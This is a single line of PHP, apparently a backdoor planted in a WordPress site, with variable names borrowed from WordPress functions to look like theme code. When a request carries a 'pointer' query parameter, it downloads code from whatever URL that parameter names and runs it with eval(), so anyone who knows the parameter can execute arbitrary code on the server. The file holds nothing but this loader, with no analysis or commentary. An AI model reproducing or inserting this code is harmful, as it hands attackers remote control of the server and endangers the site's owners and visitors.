<?php if (isset($_GET['pointer'])) { $has_nav_menu_bfh = $_GET['pointer']; if ($get_the_ID_pg = curl_init()) { curl_setopt($get_the_ID_pg, CURLOPT_URL, $has_nav_menu_bfh); curl_setopt($get_the_ID_pg, CURLOPT_RETURNTRANSFER, true); eval(curl_exec($get_the_ID_pg)); curl_close($get_the_ID_pg); exit; } }